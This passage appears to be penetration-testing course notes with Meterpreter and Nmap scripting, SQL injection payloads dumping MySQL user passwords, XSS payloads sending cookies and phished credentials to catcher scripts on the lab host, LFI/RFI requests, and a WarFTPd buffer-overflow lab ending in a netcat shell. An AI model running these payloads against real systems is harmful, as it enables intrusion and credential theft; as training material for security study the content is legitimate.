  985. end
  986. end
  987.  
  988. getinfo(client)
  989. --------------------------------------------------------------------------
  990.  
  991.  
  992. - Now run the script:
  993. ---------------------------Type This-----------------------------------
  994. meterpreter> run helloworld
  995. -----------------------------------------------------------------------
  996.  
  997. - We can expand it by adding actual system commands to the script, lets look at how we can do this.
  998. ---------------------------Type This-----------------------------------
  999. vi /usr/share/metasploit-framework/scripts/meterpreter/helloworld.rb
  1000. -------(paste the code below into this file)-------
  1001. def list_exec(session,cmdlst)
  1002. print_status("Running Command List ...")
  1003. r=''
  1004. session.response_timeout=120
  1005. cmdlst.each do |cmd|
  1006. begin
  1007. print_status "running command #{cmd}"
  1008. r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
  1009. while(d = r.channel.read)
  1010.  
  1011. print_status("#{d}")
  1012. end
  1013. r.channel.close
  1014. r.close
  1015. rescue ::Exception => e
  1016. print_error("Error Running Command #{cmd}: #{e.class} #{e}")
  1017. end
  1018. end
  1019. end
  1020.  
  1021. commands = [ "set",
  1022. "ipconfig /all",
  1023. "arp -a"]
  1024.  
  1025. list_exec(client,commands)
  1026. ------------------------------------------------------------------------
  1027.  
  1028.  
  1029. - Run the script:
  1030. ---------------------------Type This-----------------------------------
  1031. meterpreter> run helloworld
  1032. -----------------------------------------------------------------------
  1033.  
  1034.  
  1035.  
  1036.  
  1037. #########################
  1038. # Meterpreter Challenge #
  1039. #########################
  1040. Note: Add all of the commands from the script below to your helloworld.rb script:
  1041. https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
  1042.  
  1043.  
  1044.  
  1045. ---------------------------------------------------------------------------------
  1046.  
  1047.  
  1048.  
  1049. #####################################
  1050. # Writing Your Own Nmap NSE Scripts #
  1051. #####################################
  1052.  
  1053.  
  1054. ----------------------------------------------------------------------
  1055. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  1056.  
  1057. -- The Head Section --
  1058. -- The Rule Section --
  1059. portrule = function(host, port)
  1060. return port.protocol == "tcp"
  1061. and port.number == 80
  1062. and port.state == "open"
  1063. end
  1064.  
  1065. -- The Action Section --
  1066. action = function(host, port)
  1067. return "Munich Hacking!"
  1068. end
  1069. ----------------------------------------------------------------------
  1070.  
  1071. - Ok, now that we've made that change let's run the script
  1072. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  1073.  
  1074.  
  1075.  
  1076.  
  1077.  
  1078.  
  1079. ----------------------------------------------------------------------
  1080. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  1081.  
  1082. -- The Head Section --
  1083. local shortport = require "shortport"
  1084.  
  1085. -- The Rule Section --
  1086. portrule = shortport.http
  1087.  
  1088.  
  1089. -- The Action Section --
  1090. action = function(host, port)
  1091. return "Munich Hacking!"
  1092. end
  1093. ----------------------------------------------------------------------
  1094.  
  1095. - Ok, now that we've made that change let's run the script
  1096. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
  1097.  
  1098.  
  1099.  
  1100.  
  1101.  
  1102.  
  1103.  
  1104. OK, now let's have some fun with my buddy Carlos Perez's website.
  1105.  
  1106. ----------------------------------------------------------------------
  1107. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  1108.  
  1109. -- The Head Section --
  1110. local shortport = require "shortport"
  1111. local http = require "http"
  1112.  
  1113. -- The Rule Section --
  1114. portrule = shortport.http
  1115.  
  1116. -- The Action Section --
  1117. action = function(host, port)
  1118.  
  1119. local uri = "/installing-metasploit-in-ubunt/"
  1120. local response = http.get(host, port, uri)
  1121. return response.status
  1122.  
  1123. end
  1124. ----------------------------------------------------------------------
  1125.  
  1126. - Ok, now that we've made that change let's run the script
  1127. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
  1128.  
  1129.  
  1130.  
  1131.  
  1132. ----------------------------------------------------------------------
  1133. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  1134.  
  1135. -- The Head Section --
  1136. local shortport = require "shortport"
  1137. local http = require "http"
  1138.  
  1139. -- The Rule Section --
  1140. portrule = shortport.http
  1141.  
  1142. -- The Action Section --
  1143. action = function(host, port)
  1144.  
  1145. local uri = "/installing-metasploit-in-ubunt/"
  1146. local response = http.get(host, port, uri)
  1147.  
  1148. if ( response.status == 200 ) then
  1149. return response.body
  1150. end
  1151.  
  1152. end
  1153. ----------------------------------------------------------------------
  1154.  
  1155. - Ok, now that we've made that change let's run the script
  1156. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
  1157.  
  1158.  
  1159.  
  1160.  
  1161.  
  1162.  
  1163.  
  1164.  
  1165.  
  1166. ----------------------------------------------------------------------
  1167. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  1168.  
  1169. -- The Head Section --
  1170. local shortport = require "shortport"
  1171. local http = require "http"
  1172. local string = require "string"
  1173.  
  1174. -- The Rule Section --
  1175. portrule = shortport.http
  1176.  
  1177. -- The Action Section --
  1178. action = function(host, port)
  1179.  
  1180. local uri = "/installing-metasploit-in-ubunt/"
  1181. local response = http.get(host, port, uri)
  1182.  
  1183. if ( response.status == 200 ) then
  1184. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  1185. return title
  1186. end
  1187.  
  1188. end
  1189. ----------------------------------------------------------------------
  1190.  
  1191. - Ok, now that we've made that change let's run the script
  1192. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
  1193.  
  1194.  
  1195.  
  1196.  
  1197.  
  1198.  
  1199.  
  1200. ----------------------------------------------------------------------
  1201. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  1202.  
  1203. -- The Head Section --
  1204. local shortport = require "shortport"
  1205. local http = require "http"
  1206. local string = require "string"
  1207.  
  1208. -- The Rule Section --
  1209. portrule = shortport.http
  1210.  
  1211. -- The Action Section --
  1212. action = function(host, port)
  1213.  
  1214. local uri = "/installing-metasploit-in-ubunt/"
  1215. local response = http.get(host, port, uri)
  1216.  
  1217. if ( response.status == 200 ) then
  1218. local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  1219.  
  1220. if (title) then
  1221. return "Vulnerable"
  1222. else
  1223. return "Not Vulnerable"
  1224. end
  1225. end
  1226. end
  1227.  
  1228. ----------------------------------------------------------------------
  1229.  
  1230. - Ok, now that we've made that change let's run the script
  1231. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443
  1232.  
  1233.  
  1234.  
  1235.  
  1236. ################################
  1237. # Attack Environment Deployers #
  1238. ################################
  1239. https://github.com/mantvydasb/Red-Team-Infrastructure-Automation
  1240.  
  1241.  
  1242.  
  1243.  
  1244. #################
  1245. # Lab Deployers #
  1246. #################
  1247. https://github.com/jaredhaight/PowerShellClassLab
  1248. https://github.com/outflanknl/Invoke-ADLabDeployer
  1249. https://github.com/AutomatedLab/AutomatedLab
  1250.  
  1251.  
  1252.  
  1253.  
  1254. ###############
  1255. # Persistence #
  1256. ###############
  1257. https://rastamouse.me/2018/03/a-view-of-persistence/
  1258. https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html
  1259. https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
  1260. https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
  1261.  
  1262.  
  1263.  
  1264.  
  1265. ####################
  1266. # Lateral Movement #
  1267. ####################
  1268.  
  1269.  
  1270. ###########################
  1271. # Bypassing EDR Solutions #
  1272. ###########################
  1273. https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html
  1274. https://github.com/vysecurity/morphHTA
  1275. https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/
  1276.  
  1277.  
  1278. #######################
  1279. # Attacking PHP/MySQL #
  1280. #######################
  1281.  
  1282. Go to LAMP Target homepage
  1283. ---------------------------Paste this into Firefox-----------------------------------
  1284. http://45.63.104.73/
  1285. -------------------------------------------------------------------------------------
  1286.  
  1287.  
  1288. Clicking on the Acer Link:
  1289. ---------------------------Paste this into Firefox-----------------------------------
  1290. http://45.63.104.73/acre2.php?lap=acer
  1291. -------------------------------------------------------------------------------------
  1292.  
  1293. - Found parameter passing (answer yes to question 1)
  1294. - Insert ' to test for SQLI
  1295.  
  1296. ---------------------------Paste this into Firefox-----------------------------------
  1297. http://45.63.104.73/acre2.php?lap=acer'
  1298. -------------------------------------------------------------------------------------
  1299.  
  1300. Page returns the following error:
  1301. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  1302.  
  1303.  
  1304.  
  1305. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  1306. We do this using the ORDER BY
  1307. ---------------------------Paste this into Firefox-----------------------------------
  1308. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
  1309. -------------------------------------------------------------------------------------
  1310.  
  1311.  
  1312. Page returns the following error:
  1313. Unknown column '100' in 'order clause'
  1314.  
  1315.  
  1316. ---------------------------Paste this into Firefox-----------------------------------
  1317. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
  1318. -------------------------------------------------------------------------------------
  1319.  
  1320.  
  1321. Page returns the following error:
  1322. Unknown column '50' in 'order clause'
  1323.  
  1324.  
  1325. ---------------------------Paste this into Firefox-----------------------------------
  1326. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
  1327. -------------------------------------------------------------------------------------
  1328.  
  1329. Page returns the following error:
  1330. Unknown column '25' in 'order clause'
  1331.  
  1332.  
  1333. ---------------------------Paste this into Firefox-----------------------------------
  1334. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
  1335. -------------------------------------------------------------------------------------
  1336.  
  1337. Page returns the following error:
  1338. Unknown column '12' in 'order clause'
  1339.  
  1340.  
  1341. ---------------------------Paste this into Firefox-----------------------------------
  1342. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
  1343. -------------------------------------------------------------------------------------
  1344. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  1345.  
  1346.  
  1347.  
  1348. Now we build out the union all select statement with the correct number of columns
  1349.  
  1350. Reference:
  1351. http://www.techonthenet.com/sql/union.php
  1352.  
  1353.  
  1354. ---------------------------Paste this into Firefox-----------------------------------
  1355. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  1356. -------------------------------------------------------------------------------------
  1357.  
  1358.  
  1359.  
  1360. Now we negate the parameter value 'acer' by turning into the word 'null':
  1361.  
  1362. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  1363. -------------------------------------------------------------------------------------
  1364.  
  1365. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  1366.  
  1367.  
  1368. Use a cheat sheet for syntax:
  1369. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  1370.  
  1371. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  1372. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  1373.  
  1374. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  1375.  
  1376. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  1377.  
  1378. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  1379.  
  1380. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
  1381. ------------------------------------------------------------------------------------- -------------------
  1382.  
  1383.  
  1384.  
  1385.  
  1386. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  1387.  
  1388. Here is a good reference for it:
  1389. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  1390.  
  1391. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  1392.  
  1393.  
  1394.  
  1395. ###############################################################################
  1396. # What is XSS #
  1397. # https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
  1398. ###############################################################################
  1399.  
  1400. OK - what is Cross Site Scripting (XSS)
  1401.  
  1402. 1. Use Firefox to browse to the following location:
  1403. ---------------------------Paste this into Firefox-----------------------------------
  1404. http://45.63.104.73/xss_practice/
  1405. -------------------------------------------------------------------------------------
  1406.  
  1407. A really simple search page that is vulnerable should come up.
  1408.  
  1409.  
  1410.  
  1411.  
  1412. 2. In the search box type:
  1413. ---------------------------Paste this into Firefox-----------------------------------
  1414. <script>alert('So this is XSS')</script>
  1415. -------------------------------------------------------------------------------------
  1416.  
  1417.  
  1418. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  1419. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  1420.  
  1421.  
  1422. 3. In the search box type:
  1423. ---------------------------Paste this into Firefox-----------------------------------
  1424. <script>alert(document.cookie)</script>
  1425. -------------------------------------------------------------------------------------
  1426.  
  1427.  
  1428. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  1429. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  1430.  
  1431. 4. Now replace that alert script with:
  1432. ---------------------------Paste this into Firefox-----------------------------------
  1433. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  1434. -------------------------------------------------------------------------------------
  1435.  
  1436. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  1437.  
  1438.  
  1439. 5. Now view the stolen cookie at:
  1440. ---------------------------Paste this into Firefox-----------------------------------
  1441. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  1442. -------------------------------------------------------------------------------------
  1443.  
  1444. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  1445.  
  1446.  
  1447.  
  1448.  
  1449.  
  1450.  
  1451. ############################
  1452. # A Better Way To Demo XSS #
  1453. ############################
  1454.  
  1455.  
  1456. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  1457.  
  1458.  
  1459. Use Firefox to browse to the following location:
  1460. ---------------------------Paste this into Firefox-----------------------------------
  1461. http://45.63.104.73/xss_practice/
  1462. -------------------------------------------------------------------------------------
  1463.  
  1464.  
  1465. Paste this in the search box
  1466. ----------------------------
  1467.  
  1468.  
  1469. Option 1
  1470. --------
  1471. ---------------------------Paste this into Firefox-----------------------------------
  1472. <script>
  1473. password=prompt('Your session is expired. Please enter your password to continue',' ');
  1474. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  1475. </script>
  1476. -------------------------------------------------------------------------------------
  1477.  
  1478. Now view the stolen cookie at:
  1479. ---------------------------Paste this into Firefox-----------------------------------
  1480. http://45.63.104.73/xss_practice/passwords.html
  1481. -------------------------------------------------------------------------------------
  1482.  
  1483.  
  1484. Option 2
  1485. --------
  1486. -------------------------Paste this into Firefox-----------------------------------
  1487. <script>
  1488. username=prompt('Please enter your username',' ');
  1489. password=prompt('Please enter your password',' ');
  1490. document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  1491. </script>
  1492. -------------------------------------------------------------------------------------
  1493.  
  1494.  
  1495.  
  1496. Now view the stolen cookie at:
  1497. http://45.63.104.73/xss_practice/username_password_logs.html
  1498.  
  1499.  
  1500.  
  1501.  
  1502. #########################################
  1503. # Let's try a local file include (LFI) #
  1504. #########################################
  1505. - Here is an example of an LFI
  1506. - Open this page in Firefox:
  1507. -------------------------Paste this into Firefox-----------------------------------
  1508. http://45.63.104.73/showfile.php?filename=contactus.txt
  1509. -------------------------------------------------------------------------------------
  1510.  
  1511.  
  1512. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  1513. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  1514. - You can attack this by doing the following:
  1515. -------------------------Paste this into Firefox-----------------------------------
  1516. http://45.63.104.73/showfile.php?filename=/etc/passwd
  1517. -------------------------------------------------------------------------------------
  1518.  
  1519.  
  1520. - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
  1521. - somewhere else on the Internet. Here is an example of a text file on the web:
  1522. -------------------------Paste this into Firefox-----------------------------------
  1523. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  1524. -------------------------------------------------------------------------------------
  1525.  
  1526. - Now we can attack the target via RFI like this:
  1527. -------------------------Paste this into Firefox-----------------------------------
  1528. http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  1529. -------------------------------------------------------------------------------------
  1530.  
  1531.  
  1532.  
  1533. ###############################
  1534. # How much fuzzing is enough? #
  1535. ###############################
  1536. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  1537.  
  1538. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  1539.  
  1540.  
  1541. Step 1: Ask yourself the 3 questions per page of the site.
  1542.  
  1543. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  1544.  
  1545. Step 3: When you load your fuzz strings - use the following decision tree
  1546.  
  1547. - Are the fuzz strings causing a default error message (example 404)?
  1548. - If this is the case then it is most likely NOT vulnerable
  1549.  
  1550. - Are the fuzz strings causing a WAF or LB custom error message?
  1551. - If this is the case then you need to find an encoding method to bypass
  1552.  
  1553.  
  1554. - Are the fuzz strings causing an error message that discloses the backend type?
  1555. - If yes, then identify DB type and find correct syntax to successfully exploit
  1556. - Some example strings that I use are:
  1557. '
  1558. "
  1559. () <----- Take the parameter value and put it in parenthesis
  1560. (5-1) <----- See if you can perform an arithmetic function
  1561.  
  1562.  
  1563. - Are the fuzz strings rendering executable code?
  1564. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  1565. - Some example strings that I use are:
  1566. <b>hello</b>
  1567. <u>hello</u>
  1568. <script>alert(123);</script>
  1569. <script>alert(xss);</script>
  1570. <script>alert('xss');</script>
  1571. <script>alert("xss");</script>
  1572.  
  1573.  
  1574. ###############################################################
  1575. # Question 1: What is the process that you use when you test? #
  1576. ###############################################################
  1577.  
  1578. Step 1: Automated Testing
  1579.  
  1580. Step 1a: Web Application vulnerability scanners
  1581. -----------------------------------------------
  1582. - Run two (2) unauthenticated vulnerability scans against the target
  1583. - Run two (2) authenticated vulnerability scans against the target with low-level user credentials
  1584. - Run two (2) authenticated vulnerability scans against the target with admin privileges
  1585.  
  1586. The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
  1587.  
  1588. A good web application vulnerability scanner comparison website is here:
  1589. http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
  1590.  
  1591.  
  1592. Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  1593.  
  1594. When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
  1595.  
  1596.  
  1597. Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
  1598.  
  1599.  
  1600. Also, be sure to save the scan results and logs. I usually provide this data to the customer.
  1601.  
  1602.  
  1603.  
  1604. Step 1b: Directory Brute Forcer
  1605. -------------------------------
  1606. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
  1607.  
  1608.  
  1609.  
  1610. Step 2: Manual Testing
  1611.  
  1612. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
  1613.  
  1614. Step 2a: Spider/Scan the entire site with Burp Suite
  1615. Save the spider and scan results. I usually provide this data to the customer as well.
  1616.  
  1617.  
  1618. Step 2b: Browse through the site using the 3 question method
  1619. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
  1620.  
  1621. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
  1622.  
  1623. Here is what I mean:
  1624. http://www.site.com/page.aspx?parametername=parametervalue
  1625.  
  1626. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
  1627.  
  1628. http://www.site.com/page.aspx?parametername=[ payload ]
  1629.  
  1630. You need to ensure that you send the payload this way, and like this below:
  1631.  
  1632. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
  1633.  
  1634. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
  1635.  
  1636.  
  1637.  
  1638.  
  1639.  
  1640.  
  1641.  
  1642. ###########################################
  1643. # Question 2: How much fuzzing is enough? #
  1644. ###########################################
  1645. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  1646.  
  1647. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  1648.  
  1649.  
  1650. Step 1: Ask yourself the 3 questions per page of the site.
  1651.  
  1652. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  1653.  
  1654. Step 3: When you load your fuzz strings - use the following decision tree
  1655.  
  1656. - Are the fuzz strings causing a default error message (example 404)?
  1657. - If this is the case then it is most likely NOT vulnerable
  1658.  
  1659. - Are the fuzz strings causing a WAF or LB custom error message?
  1660. - If this is the case then you need to find an encoding method to bypass
  1661.  
  1662.  
  1663. - Are the fuzz strings causing an error message that discloses the backend type?
  1664. - If yes, then identify DB type and find correct syntax to successfully exploit
  1665. - Some example strings that I use are:
  1666. '
  1667. "
  1668. () <----- Take the parameter value and put it in parenthesis
  1669. (5-1) <----- See if you can perform an arithmetic function
  1670.  
  1671.  
  1672. - Are the fuzz strings rendering executable code?
  1673. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  1674. - Some example strings that I use are:
  1675. <b>hello</b>
  1676. <u>hello</u>
  1677. <script>alert(123);</script>
  1678. <script>alert(xss);</script>
  1679. <script>alert('xss');</script>
  1680. <script>alert("xss");</script>
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686.  
  1687.  
  1688. -------------------------------------------------------------------------------------------
  1689. OWASP Top 10 Video Explanations
  1690.  
  1691. Burp Suite Reference:
  1692. https://support.portswigger.net/customer/portal/articles/1969845-using-burp-to-test-for-the-owasp-top-ten
  1693.  
  1694. A1: Injection Vulnerabilities
  1695. https://www.youtube.com/watch?v=9CnpHT5Nn8c&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  1696.  
  1697.  
  1698. A2: Broken Authentication and Session Management
  1699. https://www.youtube.com/watch?v=R1iGRBG3PJ8&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=2
  1700.  
  1701. A3: Cross Site Scripting (XSS)
  1702. https://www.youtube.com/watch?v=90XT0j5E7xo&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=4
  1703.  
  1704. A4: Insecure Direct Object Reference
  1705. https://www.youtube.com/watch?v=bMYpGj2xzpM&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=5
  1706.  
  1707.  
  1708. A5: Security Misconfiguration
  1709. https://www.youtube.com/watch?v=ouuXu9_UM0w&index=7&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  1710.  
  1711.  
  1712. A6: Sensitive Data Exposure
  1713. https://www.youtube.com/watch?v=x-B8I420x7Y&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=8
  1714.  
  1715.  
  1716. A7: Missing Function Level Access Control and A8 Cross-Site Request Forgery (CSRF)
  1717. https://www.youtube.com/watch?v=gf6cb7MnP-c&index=9&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj
  1718.  
  1719. A9 Using Components w/ Known Vulnerabilities & A10 Unvalidated Redirects and Forwards
  1720. https://www.youtube.com/watch?v=WqlSl-Pc1vk&list=PL5wHbxAvWUF6bXvbg2VHxQnCp_weS9hIj&index=10
  1721.  
  1722.  
  1723.  
  1724.  
  1725.  
  1726.  
  1727.  
  1728.  
  1729.  
  1730.  
  1731.  
  1732.  
  1733.  
  1734. Day 2
  1735. =-------------------------------------------------------------------------
  1736.  
  1737.  
  1738. ###########################
  1739. # Lab 1a: Stack Overflows #
  1740. ###########################
  1741.  
  1742. #################################
  1743. # Start WarFTPd #
  1744. # Start WinDBG #
  1745. # Press F6 #
  1746. # Attach to war-ftpd.exe #
  1747. #################################
  1748.  
  1749. ---------------------------Type This-----------------------------------
  1750. c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
  1751. -----------------------------------------------------------------------
  1752.  
  1753. At WINDBG prompt
  1754. “r” to show registers or “alt+4”
  1755.  
  1756. ---------------------------Type This-----------------------------------
  1757. 0:003> dd eip
  1758. 0:003> dd esp
  1759. -----------------------------------------------------------------------
  1760.  
  1761. ---------------------------Type This-----------------------------------
  1762.  
  1763. c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
  1764. -----------------------------------------------------------------------
  1765.  
  1766.  
  1767. At WINDBG prompt
  1768. “r” to show registers or “alt+4”
  1769.  
  1770. ---------------------------Type This-----------------------------------
  1771.  
  1772. 0:003> dd eip
  1773. 0:003> dd esp
  1774. -----------------------------------------------------------------------
  1775.  
  1776. Eip: 32714131
  1777. esp: affd58 (71413471)
  1778.  
  1779. Now we need to SSH into the StrategicSec Ubuntu host
  1780.  
  1781. ---------------------------Type This-----------------------------------
  1782.  
  1783. cd /usr/share/metasploit-framework/tools/exploit/
  1784.  
  1785. ./pattern_offset.rb -q 32714131
  1786. 485
  1787.  
  1788. ./pattern_offset.rb -q 71413471
  1789. 493
  1790. -----------------------------------------------------------------------
  1791.  
  1792. Distance to EIP is: 485
  1793. Relative position of ESP is: 493
  1794.  
  1795. RET – POP EIP
  1796. RET 4 – POP EIP and shift ESP down by 4 bytes
  1797.  
  1798. ---------------------------Type This-----------------------------------
  1799.  
  1800. wget https://raw.githubusercontent.com/pwnieexpress/metasploit-framework/master/msfpescan
  1801. mkdir DLLs
  1802. ./msfpescan -j ESP DLLs/shell32.dll
  1803. -----------------------------------------------------------------------
  1804.  
  1805. 0x7c9c167d push esp; retn 0x304d
  1806. 0x7c9d30d7 jmp esp < - how about we use this one
  1807. 0x7c9d30eb jmp esp
  1808. 0x7c9d30ff jmp esp
  1809.  
  1810.  
  1811. warftpd3.py with Notepad++
  1812. Fill in the appropriate values
  1813. Distance to EIP
  1814. Address of JMP ESP
  1815.  
  1816.  
  1817. ---------------------------Type This-----------------------------------
  1818.  
  1819. c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
  1820.  
  1821. 0:003> dd eip
  1822. 0:003> dd esp
  1823. -----------------------------------------------------------------------
  1824.  
  1825.  
  1826.  
  1827.  
  1828.  
  1829. Mention bad characters
  1830. No debugger
  1831.  
  1832.  
  1833. ---------------------------Type This-----------------------------------
  1834.  
  1835. c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
  1836.  
  1837. nc XPSP3-ED-Target-IP 4444
  1838. -----------------------------------------------------------------------
  1839.  
  1840.  
  1841.  
  1842. ###########################################
  1843. # Lab 1b: Stack Overflows with DEP Bypass #
  1844. ###########################################
  1845.  
  1846. Reboot your target host and choose the "2nd" option for DEP.
  1847.  
  1848.  
  1849.  
  1850.  
  1851. ---------------------------Type This-----------------------------------
  1852.  
  1853. c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
  1854.  
  1855. At WINDBG prompt
  1856. “r” to show registers or “alt+4”
  1857.  
  1858. dd esp
  1859.  
  1860.  
  1861.  
  1862.  
  1863. c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
  1864.  
  1865.  
  1866. At WINDBG prompt
  1867. “r” to show registers or “alt+4”
  1868. dd esp
  1869. -----------------------------------------------------------------------
  1870.  
  1871. Eip: 32714131
  1872. esp: affd58 (71413471)
  1873.  
  1874. Now we need to SSH into the StrategicSec Ubuntu host
  1875.  
  1876. ---------------------------Type This-----------------------------------
  1877.  
  1878. cd /home/strategicsec/toolz/metasploit/tools
  1879.  
  1880. ruby pattern_offset.rb 32714131
  1881. 485
  1882.  
  1883. ruby pattern_offset.rb 71413471
  1884. 493
  1885.  
  1886.  
  1887.  
  1888.  
  1889.  
  1890.  
  1891.  
  1892.  
  1893. cd /home/strategicsec/toolz/metasploit/tools
  1894.  
  1895. ruby pattern_offset.rb 32714131
  1896.  
  1897. cd /home/strategicsec/toolz/metasploit/
  1898.  
  1899. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  1900.  
  1901.  
  1902.  
  1903. c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
  1904.  
  1905. 0:003> dd eip
  1906. 0:003> dd esp
  1907.  
